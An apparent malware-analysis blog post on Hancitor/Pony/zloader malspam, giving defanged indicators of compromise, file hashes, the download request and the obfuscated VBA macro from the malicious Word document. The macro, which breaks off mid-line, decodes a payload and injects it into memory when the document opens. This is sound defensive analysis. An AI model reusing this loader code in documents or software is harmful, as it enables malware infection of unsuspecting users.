{"id":697,"date":"2017-01-26T21:45:16","date_gmt":"2017-01-26T21:45:16","guid":{"rendered":"http:\/\/www.herbiez.com\/?p=697"},"modified":"2017-01-27T09:39:37","modified_gmt":"2017-01-27T09:39:37","slug":"2017-01-25-hancitorponyzloader-malspam","status":"publish","type":"post","link":"https:\/\/www.herbiez.com\/?p=697","title":{"rendered":"2017-01-25 Hancitor\/Pony\/zloader Malspam"},"content":{"rendered":"<p>In this post I was able to investigate a Hancitor\/Pony\/zloader malspam message. Looking around for some more information about this infection, I was able to find the following links:<\/p>\n<p> &#8211; Brad&#8217;s SANS ISC Blog post talking about this exact malspam: <a href=\"http:\/\/isc.sans.edu\/forums\/diary\/HancitorPonyVawtrak+malspam\/21919\/\" target=\"_blank\">http:\/\/isc.sans.edu\/forums\/diary\/HancitorPonyVawtrak+malspam\/21919\/<\/a><\/p>\n<p>&#8211; Hybrid Analysis&#8217; report for another example of this malspam: <a href=\"http:\/\/www.hybrid-analysis.com\/sample\/827873b4d0b846e9bc372bfdac135ec7431baa809366633df4eac15235b9736c?environmentId=100\" target=\"_blank\">http:\/\/www.hybrid-analysis.com\/sample\/827873b4d0b846e9bc372bfdac135ec7431baa809366633df4eac15235b9736c?environmentId=100<\/a><\/p>\n<p>&#8211; Looking at the Virustotal comments, I saw Techhelplist had commented about this and then looked for the Tweet: <a href=\"http:\/\/twitter.com\/Techhelplistcom\/status\/824283429181259776\" target=\"_blank\">http:\/\/twitter.com\/Techhelplistcom\/status\/824283429181259776<\/a><\/p>\n<p>As usual, all the artifacts, the PCAP, and ProcMon log can be found in my Github repo for this investigation <a href=\"http:\/\/github.com\/bloomer1016\/2017-01-26-Hancitor-Pony-zloader-Malspam\" target=\"_blank\">here<\/a>.<\/p>\n<p><strong>Update<\/strong><br \/>\nAfter posting this blog entry out on Twitter, <a href=\"http:\/\/twitter.com\/Ledtech3\" target=\"_blank\">David Ledbetter<\/a> sent me an update letting me know that MalwareBytes had covered 
another maldoc that was the same as the one here. For that great write-up please see their blog <a href=\"http:\/\/blog.malwarebytes.com\/cybercrime\/2017\/01\/zbot-with-legitimate-applications-on-board\/\" target=\"_blank\">here<\/a>.<\/p>\n<p><a href=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/01\/Orig_Email.png\"><img loading=\"lazy\" decoding=\"async\" src=\"http:\/\/www.herbiez.com\/wp-content\/uploads\/2017\/01\/Orig_Email.png\" alt=\"\" width=\"1451\" height=\"840\" class=\"aligncenter size-full wp-image-698\" \/><\/a><\/p>\n<p>Indicators of Compromise:<br \/>\n=========================<br \/>\napi.ipify[.]org \/ 54.243.91.166<br \/>\nhedthowtorspar[.]com \/ 95.169.190.104<br \/>\nsy-nitron[.]pl \/ 77.79.246.210<br \/>\nrowatterding[.]ru \/ 62.76.89.178<br \/>\ncheckip.dyndns[.]com \/ 216.146.38.70<br \/>\ncheckip.dyndns[.]com \/ 91.198.22.70<br \/>\nhxxp:\/\/hedthowtorspar[.]com\/klu\/forum.php<br \/>\nhxxp:\/\/fortmamuchco[.]ru\/klu\/forum.php<br \/>\nhxxp:\/\/fortrittotfor[.]ru\/klu\/forum.php<br \/>\nhxxp:\/\/sy-nitron[.]pl\/wp-content\/themes\/twentyfifteen\/pm1<br \/>\nhxxp:\/\/acdclubs[.]com\/wp-content\/plugins\/quick-setup\/pm1<br \/>\nhxxp:\/\/cwmeza[.]com\/wp-content\/plugins\/video-silo-builder-1[.]6[.]3\/pm1<br \/>\nhxxp:\/\/drums-outlet[.]com\/wp-content\/plugins\/wordbay\/pm1<br \/>\nhxxp:\/\/gojokai-trouble[.]com\/wp-content\/plugins\/contact-form-7\/modules\/pm1<br \/>\nhxxp:\/\/hareruyalife[.]com\/wp-content\/plugins\/feedwordpress\/pm1<br \/>\nhxxp:\/\/sy-nitron[.]pl\/wp-content\/themes\/twentyfifteen\/2501<br \/>\nhxxp:\/\/acdclubs[.]com\/wp-content\/plugins\/quick-setup\/2501<br \/>\nhxxp:\/\/cwmeza[.]com\/wp-content\/plugins\/video-silo-builder-1[.]6[.]3\/2501<br \/>\nhxxp:\/\/drums-outlet[.]com\/wp-content\/plugins\/wordbay\/2501<br \/>\nhxxp:\/\/gojokai-trouble[.]com\/wp-content\/plugins\/contact-form-7\/modules\/2501<br \/>\nhxxp:\/\/hareruyalife[.]com\/wp-content\/plugins\/feedwordpress\/2501<\/p>\n<p>Artifacts:<br 
\/>\n==========<br \/>\nFile name: eFax_kyle.haley.doc<br \/>\nFile size: 197KB<br \/>\nMD5 hash: ea664510dbc15aa2bd1d865cdd771a58<br \/>\nVirustotal : <a href=\"http:\/\/www.virustotal.com\/en\/file\/9c1ad87660e13b35fc48961f0936e9724aa763a3130e194bf67402a118d32657\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/9c1ad87660e13b35fc48961f0936e9724aa763a3130e194bf67402a118d32657\/analysis\/<\/a><br \/>\nFirst detection: 2017-01-25 15:14:37 UTC<br \/>\nDetection ratio: 21 \/ 55<\/p>\n<p>File name: akpeydzais.crt<br \/>\nFile size: 1.0KB<br \/>\nMD5 hash: c64eef3e401928160b498c5042617a39<br \/>\nVirustotal: NA<\/p>\n<p>File name: certutil.exe<br \/>\nFile size: 102KB<br \/>\nMD5 hash: 0c6b43c9602f4d5ac9dcf907103447c4<br \/>\nVirustotal: <a href=\"http:\/\/www.virustotal.com\/en\/file\/5950722034c8505daa9b359127feb707f16c37d2f69e79d16ee6d9ec37690478\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/5950722034c8505daa9b359127feb707f16c37d2f69e79d16ee6d9ec37690478\/analysis\/<\/a><br \/>\nFirst detection: 2012-09-08 17:53:10 UTC<br \/>\nDetection ratio: 0 \/ 56<\/p>\n<p>File name: freebl3.dll<br \/>\nFile size: 217K<br \/>\nMD5 hash: 269beb631b580c6d54db45b5573b1de5<br \/>\nVirustotal: <a href=\"http:\/\/www.virustotal.com\/en\/file\/ffc7558a61a4e6546cf095bdeabea19f05247a0daa02dca20ea3605e7fc62c77\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/ffc7558a61a4e6546cf095bdeabea19f05247a0daa02dca20ea3605e7fc62c77\/analysis\/<\/a><br \/>\nFirst detection: 2013-02-05 15:36:34 UTC<br \/>\nDetection ratio: 0 \/ 54<\/p>\n<p>File name: libnspr4.dll<br \/>\nFile size: 195KB<br \/>\nMD5 hash: 6e84af2875700285309dd29294365c6a<br \/>\nVirustotal: <a href=\"http:\/\/www.virustotal.com\/en\/file\/1c158e680749e642e55f721f60a71314e26e03e785cd92e560bf650b83c4c3c8\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/1c158e680749e642e55f721f60a71314e26e03e785cd92e560bf650b83c4c3c8\/analysis\/<\/a><br \/>\nFirst 
detection: 2013-02-05 15:36:35 UTC<br \/>\nDetection ratio: 0 \/ 57<\/p>\n<p>File name: libplc4.dll<br \/>\nFile size: 14KB<br \/>\nMD5 hash: 1fae68b740f18290b98b2f9e23313cc2<br \/>\nVirustotal: <a href=\"http:\/\/www.virustotal.com\/en\/file\/751c2156dc00525668dd990d99f7f61c257951c3fad01c0ee6359fcdff69f933\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/751c2156dc00525668dd990d99f7f61c257951c3fad01c0ee6359fcdff69f933\/analysis\/<\/a><br \/>\nFirst detection: 2013-03-22 18:37:04 UTC<br \/>\nDetection ratio: 0 \/ 56<\/p>\n<p>File name: libplds4.dll<br \/>\nFile size: 12KB<br \/>\nMD5 hash: 9ae76db13972553a5de5bdd07b1b654d<br \/>\nVirustotal: <a href=\"http:\/\/www.virustotal.com\/en\/file\/38a906373419501966daf6ec19ca2f8db7b29609128ae5cb424d2aa511652c29\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/38a906373419501966daf6ec19ca2f8db7b29609128ae5cb424d2aa511652c29\/analysis\/<\/a><br \/>\nFirst detection: 2014-01-22 13:27:20 UTC<br \/>\nDetection ratio: 0 \/ 56<\/p>\n<p>File name: msvcr100.dll<br \/>\nFile size: 756KB<br \/>\nMD5 hash: 0e37fbfa79d349d672456923ec5fbbe3<br \/>\nVirustotal: <a href=\"http:\/\/www.virustotal.com\/en\/file\/8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18\/analysis\/<\/a><br \/>\nFirst detection: 2011-08-10 17:05:25 UTC<br \/>\nDetection ratio: 0 \/ 56<\/p>\n<p>File name: nss3.dll<br \/>\nFile size: 780KB<br \/>\nMD5 hash: a1c4628d184b6ab25550b1ce74f44792<br \/>\nVirustotal: <a href=\"http:\/\/www.virustotal.com\/en\/file\/3f997d3f1674de9fd119f275638861bc229352f12c70536d8c83a70fcc370847\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/3f997d3f1674de9fd119f275638861bc229352f12c70536d8c83a70fcc370847\/analysis\/<\/a><br \/>\nFirst detection: 2013-03-22 18:52:21 UTC<br \/>\nDetection ratio: 0 \/ 56 <\/p>\n<p>File name: 
nssdbm3.dll<br \/>\nFile size: 106KB<br \/>\nMD5 hash: 051652ba7ca426846e936bc5aa3f39f3<br \/>\nVirustotal: <a href=\"http:\/\/www.virustotal.com\/en\/file\/8eca993570fa55e8fe8f417143eea8128a58472e23074cbd2e6af4d3bb0f0d9a\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/8eca993570fa55e8fe8f417143eea8128a58472e23074cbd2e6af4d3bb0f0d9a\/analysis\/<\/a><br \/>\nFirst detection: 2013-12-23 13:43:20 UTC<br \/>\nDetection ratio: 0 \/ 56<\/p>\n<p>File name: nssutil3.dll<br \/>\nFile size: 92KB<br \/>\nMD5 hash: c26e940b474728e728cafe5912ba418a<br \/>\nVirustotal: <a href=\"http:\/\/www.virustotal.com\/en\/file\/1af1ac51a92b36de8d85d1f572369815404912908c3a489a6cd7ca2350c2a93d\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/1af1ac51a92b36de8d85d1f572369815404912908c3a489a6cd7ca2350c2a93d\/analysis\/<\/a><br \/>\nFirst detection: 2013-12-23 13:43:24 UTC<br \/>\nDetection ratio: 1 \/ 57<\/p>\n<p>File name: smime3.dll<br \/>\nFile size: 96KB<br \/>\nMD5 hash: a5c670edf4411bf7f132f4280026137b<br \/>\nVirustotal: <a href=\"http:\/\/www.virustotal.com\/en\/file\/aba2732c7a016730e94e645dd04e8fafcc173fc2e5e2aac01a1c0c66ead1983e\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/aba2732c7a016730e94e645dd04e8fafcc173fc2e5e2aac01a1c0c66ead1983e\/analysis\/<\/a><br \/>\nFirst detection: 2014-01-22 13:29:10 UTC<br \/>\nDetection ratio: 0 \/ 56<\/p>\n<p>File name: softokn3.dll<br \/>\nFile size: 169KB<br \/>\nMD5 hash: 2ab31c9401870adb4e9d88b5a6837abf<br \/>\nVirustotal: <a href=\"http:\/\/www.virustotal.com\/en\/file\/22ecece561510f77b100cff8109e5ed492c34707b7b14e0774aaa9ca813de4ad\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/22ecece561510f77b100cff8109e5ed492c34707b7b14e0774aaa9ca813de4ad\/analysis\/<\/a><br \/>\nFirst detection: 2014-01-22 13:29:49 UTC<br \/>\nDetection ratio: 0 \/ 56<\/p>\n<p>File name: sqlite3.dll<br \/>\nFile size: 414K<br \/>\nMD5 hash: b58848a28a1efb85677e344db1fd67e6<br 
\/>\nVirustotal: <a href=\"http:\/\/www.virustotal.com\/en\/file\/00db98ab4d50e9b26ecd193bfad6569e1dd395db14246f8c233febba93965f7a\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/00db98ab4d50e9b26ecd193bfad6569e1dd395db14246f8c233febba93965f7a\/analysis\/<\/a><br \/>\nFirst detection: 2013-02-05 15:36:47 UTC<br \/>\nDetection ratio: 0 \/ 57<\/p>\n<p>File name: vele.tal<br \/>\nFile size: 190KB<br \/>\nMD5 hash: 0f2f862c23fbfe43189702a79d2fd969<br \/>\nVirustotal: NA<\/p>\n<p>File name: oqluy.php<br \/>\nFile size: 3.0KB<br \/>\nMD5 hash: 2c2e142b8d99829a9282647343a24f62<br \/>\nVirustotal: NA<\/p>\n<p>File name: php.exe<br \/>\nFile size: 28KB<br \/>\nMD5 hash: 4f060d308f8ebdc888c88d94e615d60f<br \/>\nVirustotal: <a href=\"http:\/\/www.virustotal.com\/en\/file\/0ea0dbcbf78a85b47ec9c98c1fd7c8ff9a71a9986cd6fcf953a1b2f15609d349\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/0ea0dbcbf78a85b47ec9c98c1fd7c8ff9a71a9986cd6fcf953a1b2f15609d349\/analysis\/<\/a><br \/>\nFirst detection: 2011-08-14 13:21:10 UTC<br \/>\nDetection ratio: 0 \/ 56<\/p>\n<p>File name: php5ts.dll<br \/>\nFile size: 5.5MB<br \/>\nMD5 hash: 7356593dd0b80023e0b416e66382b63c<br \/>\nVirustotal: <a href=\"http:\/\/www.virustotal.com\/en\/file\/018e13cab4c50261776dc7f641f1c3dd1000cafa21759bac221765663efce806\/analysis\/\" target=\"_blank\">http:\/\/www.virustotal.com\/en\/file\/018e13cab4c50261776dc7f641f1c3dd1000cafa21759bac221765663efce806\/analysis\/<\/a><br \/>\nFirst detection: 2011-11-01 20:45:32 UTC<br \/>\nDetection ratio: 0 \/ 56<\/p>\n<p>Analysis:<br \/>\n=========<br \/>\nWhen the user gets this email, they are asked to view the eFax at the URL in the email which actually points to &#8220;hxxp:\/\/www.lifelabs.vn\/api\/get.php?id=a3lsZS5oYWxleUByYWNrc3BhY2UuY29t&#8221; as seen in the image above. 
Once the user clicks on this link they are prompted to download and save an Office Word doc.<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nGET \/api\/get.php?id=a3lsZS5oYWxleUByYWNrc3BhY2UuY29t HTTP\/1.1\r\nAccept: text\/html, application\/xhtml+xml, *\/*\r\nAccept-Language: en-US\r\nUser-Agent: Mozilla\/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident\/6.0)\r\nAccept-Encoding: gzip, deflate\r\nHost: www.lifelabs.vn\r\nDNT: 1\r\nConnection: Keep-Alive\r\n\r\nHTTP\/1.1 200 OK\r\nServer: nginx\r\nDate: Wed, 25 Jan 2017 15:51:21 GMT\r\nContent-Type: application\/msword;\r\nTransfer-Encoding: chunked\r\nConnection: keep-alive\r\nContent-Disposition: attachment; filename=eFax_kyle.haley.doc\r\nPragma: private\r\nVary: Accept-Encoding,User-Agent\r\nContent-Encoding: gzip\r\nExpires: Tue, 16 Jun 2020 20:00:00 GMT\r\n<\/pre>\n<p>Using OfficeMalScanner I was able to pull 3 files out of it that looked suspicious according to OfficeMalScanner. 
The following are 2 of those 3 files but are still obfuscated.<\/p>\n<pre class=\"brush: vb; light: false; title: Click here to expand...; toolbar: true; notranslate\" title=\"Click here to expand...\">\r\nselfaddressed:\r\n==============\r\nAttribute VB_Name = &quot;selfaddressed&quot;\r\n' And when I doubt\r\n' You remind me of just how lucky I am\r\n' Because it's the hardest thing I've ever done\r\n#If Win64 Then\r\n' You remind me of just how lucky I am\r\n' You always seem\r\n' Because it's the hardest thing I've ever done\r\nPublic Declare PtrSafe Function unapprized Lib &quot;Shlwapi.dll&quot; Alias &quot;SHCreateThread&quot; (ByVal saxony As LongPtr, ByVal abuna As Any, ByVal sarawakian As LongPtr, ByVal salmo As LongPtr) As LongPtr\r\n' You surprise me with\r\n' \ufeffSometimes I doubt the path I chose\r\n' And my bad examples\r\nPublic Declare PtrSafe Function appreciably Lib &quot;Kernel32.dll&quot; Alias &quot;ReadConsoleW&quot; (ByVal heraldry As LongPtr,algometry As LongPtr,blowfly As LongPtr,bruin As LongPtr,conclusive As LongPtr) As Boolean\r\n' You're my belief\r\n' Sometimes my dreams feel all on hold\r\n' There's no doubt that this will make me strong\r\nPublic Declare PtrSafe Function ascription Lib &quot;Shell32.dll&quot; Alias &quot;SHGetDesktopFolder&quot; (myoma As LongPtr)\r\n' If you are dreaming\r\n' Just how perfect you are\r\n' Just how perfect you are\r\nPublic Declare PtrSafe Function distended Lib &quot;Kernel32.dll&quot; Alias &quot;LocalFree&quot; (literati As LongPtr) As LongPtr\r\n' Just how perfect you are\r\n' The stronger one\r\n' Because it's the hardest thing I've ever done\r\nPublic Declare PtrSafe Function discoglossidae Lib &quot;ntdll.dll&quot; Alias &quot;NtAllocateVirtualMemory&quot; (cristobalite As LongPtr, dummy As LongPtr, ByVal welloff As LongPtr,pharisaismByVal As LongPtr, accipiter As LongPtr, ByVal ar As LongPtr) As LongPtr\r\n' If you are dreaming\r\n' You surprise me with just how perfect you are\r\n' You 
remind me of just how perfect you are\r\nPublic Declare PtrSafe Function carnally Lib &quot;Ntdll.dll&quot; Alias &quot;NtWriteVirtualMemory&quot; (ByVal chippendale As Any, ByVal chudder As Any, ByVal elbows As Any, ByVal churchdoor As Any, ByVal pyrrhus As Any) As LongPtr\r\n' You remind me of just how lucky I am\r\n' Even with all my flaws\r\n' You surprise me with just how perfect you are\r\nPublic Declare PtrSafe Function already Lib &quot;Shell32.dll&quot; Alias &quot;SHGetSettings&quot; (freshet As LongPtr,caruncle As LongPtr) As LongPtr\r\n' I never want to wake you up\r\n' Out in the world that's beyond my control\r\n' When I'm at my wit's end\r\nPublic Declare PtrSafe Function atlantes Lib &quot;Shell32.dll&quot; Alias &quot;SHChangeNotification_Lock&quot; (vat As LongPtr, abutter As Any,haystack As LongPtr, fit As Any) As Boolean\r\n' Because it's the hardest thing I've ever done\r\n' I'm suppose to be\r\n' I never want to wake you up\r\n\r\n' I never want to wake you up\r\n'\r\n' You search for me\r\n#Else\r\n' The stronger one\r\n' And when I'm lost\r\n' I'm suppose to be\r\nPublic Declare Function solanum Lib &quot;Kernel32.dll&quot; Alias &quot;LocalFree&quot; (spartan As Long) As Long\r\n' You're my belief\r\n' You always seem\r\n' Still, I hold my breath each time you go\r\nPublic Declare Function bargainpriced Lib &quot;Shell32.dll&quot; Alias &quot;SHGetSettings&quot; (geared As Long, followon As Long) As Long\r\n' Just how perfect you are\r\n'\r\n' And my bad examples\r\nPublic Declare Function toastmaster Lib &quot;Shell32.dll&quot; Alias &quot;SHGetDesktopFolder&quot; (aedes As Long)\r\n' Sometimes my dreams feel all on hold\r\n' Because it's the hardest thing I've ever done\r\n' And I'm losing my head\r\nPublic Declare Function latimeridae Lib &quot;Shell32.dll&quot; Alias &quot;SHChangeNotification_Lock&quot; (gorgonocephalus As Long, gradeconstructed As Any, beelzebub As Long, lhonneur As Any) As Boolean\r\n' Because it's the hardest thing 
I've ever done\r\n' You're my belief\r\n' Sometimes my dreams feel all on hold\r\nPublic Declare Function unapprized Lib &quot;Shlwapi.dll&quot; Alias &quot;SHCreateThread&quot; (ByVal affirm As Long, ByVal panonychus As Any, ByVal losing As Any, ByVal harmonically As Any) As Long\r\n' You surprise me with just how perfect you are\r\n' Because it's the hardest thing I've ever done\r\n' You're my belief\r\nPublic Declare Function chimakum Lib &quot;Kernel32.dll&quot; Alias &quot;ReadConsoleW&quot; (ByVal conversation As Long, hello As Long, reovirus As Long, skater As Long, givenness As Long) As Boolean\r\n' And I'm losing my head\r\n' And when I'm lost\r\n' You remind me of just how lucky I am\r\nPublic Declare Function discoglossidae Lib &quot;Ntdll.dll&quot; Alias &quot;NtAllocateVirtualMemory&quot; (flexible As Long, endodontist As Long, ByVal allocution As Long, bissextileByVal As Long, dragonnade As Long, ByVal gangrenous As Long) As Long\r\n' You surprise me with\r\n' You remind me of just how perfect you are\r\n' You surprise me with just how perfect you are\r\nPublic Declare Function carnally Lib &quot;Ntdll.dll&quot; Alias &quot;NtWriteVirtualMemory&quot; (ByVal accueil As Any, ByVal collapsible As Any, ByVal romanian As Any, ByVal hejira As Any, ByVal sorceress As Any) As Long\r\n' Still, I hold my breath each time you go\r\n' Just how perfect you are\r\n' To prove that theory wrong\r\n\r\n' I'm suppose to be\r\n' And when I doubt\r\n' The stronger one\r\n#End If\r\n' You surprise me with\r\n' Still, I hold my breath each time you go\r\n' And my bad examples\r\nFunction bifilar(emperor)\r\nbifilar = AscW(emperor)\r\nEnd Function\r\nFunction nonsuccess(caboose) As String\r\nDim coltsfoot As Variant\r\n\r\ncheckpoint = ail\r\n\r\nDim remonetize As Integer\r\nDim sembarquer(63) As Long\r\nDim cuban As Long\r\nDim blackberry As String\r\nDim indisputable(63) As Long\r\nDim gracilariid As Long\r\nDim deuterogamy As Variant\r\n\r\nDim kudzu(6965) As Byte\r\nDim 
ichneumon(63) As Long\r\nDim sidewheeler As Long\r\nDim rower As Long\r\naffably = Rnd(363.395 + 288.6023)\r\n\r\nDim regiment As Variant\r\n\r\nDim bootlace() As Byte\r\ncatchpenny = &quot;gouache&quot;\r\n\r\ndithering = 16 + 104 - 86 + 16515038\r\nDim aztreonam As Long\r\n\r\nallhallows = 255\r\nproctor = 64\r\ncaredfor = 33 + 5 + 65242\r\ntestaceology = 262144\r\nDim albification As Variant\r\n\r\nDim gainful As Variant\r\n\r\nhesitancy = 258048\r\nnervousness = 4032\r\nluger = 63\r\nslog = 79 + 4017\r\nambergris = 62 + 59 + 77 + 16711482\r\ngvisum = 126 + 117 + 13\r\ncymbid = 65536\r\nDim affluence As Long\r\npalace = 53 - 53\r\narmorclad = 51 - 53 + 7461\r\nDim gilbert() As Byte\r\ngilbert = VBA.StrConv(caboose, vbFromUnicode)\r\nDim markbelow As String\r\nfierily = 16\r\noiling = 12156\r\noutspeak = 374597\r\noiling = Pmt(0.068, fierily, -22301, outspeak, 0)\r\n\r\nfain = 7459\r\nlanthanum = 35\r\nauthenticate = Log(100) \/ Log(10) + 14\r\nFor affirmance = 0 To fain\r\nIf affirmance Mod 2 = 0 Then\r\ngilbert(affirmance) = gilbert(affirmance) + authenticate\r\nElse\r\ngilbert(affirmance) = gilbert(affirmance) + authenticate - 1\r\nEnd If\r\nNext affirmance\r\nsteprelationship = 37\r\nplatyrrhini = 13272\r\ningenuousness = 253747\r\ncheekbone = SLN(ingenuousness, platyrrhini, steprelationship)\r\n\r\nremonetize = 0\r\nschemist = 0\r\nfiligree = 43\r\npipelaying = immunity\r\nFor gracilariid = 0 To 63\r\nindisputable(gracilariid) = choriotis(gracilariid, proctor, 3)\r\nsembarquer(gracilariid) = choriotis(gracilariid, slog, 3)\r\nichneumon(gracilariid) = choriotis(gracilariid, testaceology, 3)\r\nNext gracilariid\r\nchrome = 99\r\nmoo = 18434\r\nbraise = 504435\r\nmoo = Pmt(0.066, chrome, -36184, braise, 0)\r\n\r\nbootlace = gilbert\r\nchildcare = 37 + 77 + 42 - 152\r\nchionanthus = 39\r\nphotomechanical = 21321\r\nloyalty = 164804\r\nprepared = SLN(loyalty, photomechanical, chionanthus)\r\n\r\nbasilica = 3\r\ncheckpoint = checkpoint\r\n\r\nammodytes = 
VBA.Math.Round(198.4053 + 497.5379)\r\n\r\naggressiveness = basilica + 1\r\nairy = 2\r\nFor rower = 0 To fain\r\ncretin = bootlace(rower)\r\ndeceleration = bootlace(rower + 2)\r\nsidewheeler = ichneumon(pipelaying(cretin)) _\r\n + sembarquer(pipelaying(bootlace(rower + 1))) + indisputable(pipelaying(deceleration)) + pipelaying(bootlace(rower + basilica))\r\ngracilariid = choriotis(sidewheeler, ambergris, 2)\r\nkudzu(cuban) = choriotis(gracilariid, cymbid, 1)\r\ngracilariid = choriotis(sidewheeler, caredfor, 2)\r\nkudzu(cuban + 1) = choriotis(gracilariid, gvisum, 1)\r\nkudzu(cuban + airy) = choriotis(sidewheeler, allhallows, 2)\r\ncuban = cuban + airy + 1\r\nrower = rower + 3\r\nNext\r\nnonsuccess = kudzu\r\nEnd Function\r\n\r\nFunction immunity()\r\nDim dicta(255) As Byte\r\nnephew = 65\r\nDo\r\ndicta(nephew) = nephew - 65\r\nnephew = nephew + 1\r\nLoop Until nephew = 91\r\nnephew = 48\r\nDo\r\ndicta(nephew) = nephew + 4\r\nnephew = nephew + 1\r\nLoop Until nephew = 58\r\nnephew = 97\r\nDo\r\ndicta(nephew) = nephew - 71\r\nnephew = nephew + 1\r\nLoop Until nephew = 123\r\ndicta(47) = 63\r\nnephew = 43\r\ndicta(nephew) = 62\r\nimmunity = dicta\r\nEnd Function\r\nFunction choriotis(anxiousness, tuille, capillarity)\r\nSelect Case capillarity\r\nCase 1\r\nchoriotis = anxiousness \\ tuille\r\nCase 2\r\nchoriotis = anxiousness And tuille\r\nCase 3\r\nchoriotis = anxiousness * tuille\r\nEnd Select\r\nEnd Function\r\nSub add()\r\n    With ActiveDocument.Sections(1).Headers(wdHeaderFooterPrimary) _\r\n        .PageNumbers\r\n        .IncludeChapterNumber = True\r\n        .ChapterPageSeparator = wdSeparatorEnDash\r\n    End With\r\nEnd Sub\r\n\r\n------------------------------------------------------\r\n------------------------------------------------------\r\n\r\nThisDocument:\r\n=============\r\nAttribute VB_Name = &quot;ThisDocument&quot;\r\nAttribute VB_Base = &quot;1Normal.ThisDocument&quot;\r\nAttribute VB_GlobalNameSpace = False\r\nAttribute VB_Creatable = 
False\r\nAttribute VB_PredeclaredId = True\r\nAttribute VB_Exposed = True\r\nAttribute VB_TemplateDerived = True\r\nAttribute VB_Customizable = True\r\nPrivate Sub Document_Open()\r\nDim marbled As Long\r\nDim philosophy As Variant\r\nceruse = &quot;movableness&quot;\r\npredestine\r\nneutrino = 46\r\nuncleanly = 16906\r\nalundum = 229440\r\nblearedness = SLN(alundum, uncleanly, neutrino)\r\nEnd Sub\r\nSub predestine()\r\nDim epizoic As Variant\r\nDim endoscopy As String\r\nlowrise = ThisDocument.ComputeStatistics(wdStatisticPages)\r\nmooncalf.review.Value = lowrise + 9\r\nlocalized = &quot;inconceivableness&quot;\r\ndiestrus = &quot;things&quot;\r\nbaldness = &quot;de&quot; &amp; &quot;meri&quot; &amp; &quot;t&quot;\r\nSet putdown = mooncalf.review.SelectedItem\r\nvehement = 15\r\njacksonian = 33516\r\nheavensent = 411417\r\nmanis = SLN(heavensent, jacksonian, vehement)\r\n\r\nkhamti = putdown.Name\r\ncapillata = 118 + 50 + 7292\r\nlandwehr = Right(khamti, capillata)\r\ncolleen = selfaddressed.nonsuccess(landwehr)\r\ncasing = 7\r\ncome = 9798\r\naugusta = 239618\r\ncome = Pmt(0.071, casing, -2400, augusta, 1)\r\n\r\nalleviation = &quot;embarrass&quot;\r\namsonia = &quot;dem&quot; &amp; &quot;onetization&quot;\r\n#If Win64 Then\r\nDim maturational As Long\r\nDim condense As LongPtr\r\nDim ean As LongPtr\r\nDim workweek As Integer\r\n#Else\r\nDim hooflike As Byte\r\nDim ean As Long\r\nDim huff As Variant\r\nDim condense As Long\r\n#End If\r\nchalice = 0\r\nimpudence = &quot;mesoderm&quot;\r\ngrapnel = 4096\r\naboideau = 29\r\namerica = 27171\r\nadamantine = 169122\r\namerica = Pmt(0.0765, aboideau, -24239, adamantine, 1)\r\n\r\ntrichotomy = &quot;acknowledgeable&quot;\r\njeroboam = &quot;easternmost&quot;\r\nawayness = &quot;symptom&quot;\r\ncryptoprocta = 32\r\nwoodworm = 37179\r\npinned = 158715\r\nloire = SLN(pinned, woodworm, cryptoprocta)\r\n\r\nprecautions = colleen\r\nsomali = &quot;servans&quot;\r\nunquestioning = &quot;aoritis&quot;\r\ncondense = 
tytonidae(precautions)\r\ntracasserie = &quot;propriety&quot;\r\nbushtit = &quot;judiciary&quot;\r\n#If Win64 Then\r\nDim indecisively As Integer\r\nDim monsoon As LongPtr\r\nDuplicate = &quot;faultfinding&quot;\r\nembezzle = &quot;spleenish&quot;\r\neffigies = &quot;disdainfully&quot;\r\nDim furfur As LongPtr\r\nflailing = 33 - 33 + 1280\r\n#ElseIf Win32 Then\r\nmelodically = &quot;menispermaceae&quot;\r\nphonics = &quot;delawarean&quot;\r\nselfdenial = &quot;niceness&quot;\r\nDim monsoon As Long\r\narrest = 36 + 478\r\nDim furfur As Long\r\nflailing = arrest + 3204\r\n\r\n#End If\r\nDim auricularia As Long\r\nDim bouleverser As String\r\nmonsoon = 104 + 23 - 127\r\nean = condense + flailing\r\nfurfur = 1\r\ntrisulcate = unapprized(ean, monsoon, furfur, monsoon)\r\nnnumber = 42\r\nbiretta = 21067\r\napplejack = 321359\r\nequate = SLN(applejack, biretta, nnumber)\r\n\r\nEnd Sub\r\n\r\nFunction tytonidae(mender)\r\nDim aeciospore As Long\r\nDim spinelessness As Integer\r\nDim cubic As String\r\nDim nacimiento As Variant\r\n#If Win64 Then\r\nDim cakile As Byte\r\nDim claustrophobic As LongPtr\r\nunclutch = 8\r\nDim dodo As String\r\nDim debriefing As LongPtr\r\nDim missay As Integer\r\nDim atonality As LongPtr\r\nDim pants As Integer\r\n#Else\r\nDim choregus As Long\r\nDim claustrophobic As Long\r\nunclutch = 4\r\nDim debriefing As Long\r\nDim milkman As String\r\nDim atonality As Long\r\nDim toxicodendron As String\r\nDim exemplary As Long\r\n#End If\r\ncaryatid = catsear(VarPtr(claustrophobic), VarPtr(mender) + 8, unclutch)\r\noperate = -1\r\ndebriefing = 0\r\nfeminate = 0\r\natonality = 29 - 59 + 31 + 9587\r\nhepaticopsida = 34 + 75 + 88 + 3899\r\nequipollent = 40 + 24\r\ndepose = discoglossidae(ByVal operate, debriefing, ByVal feminate, atonality, ByVal 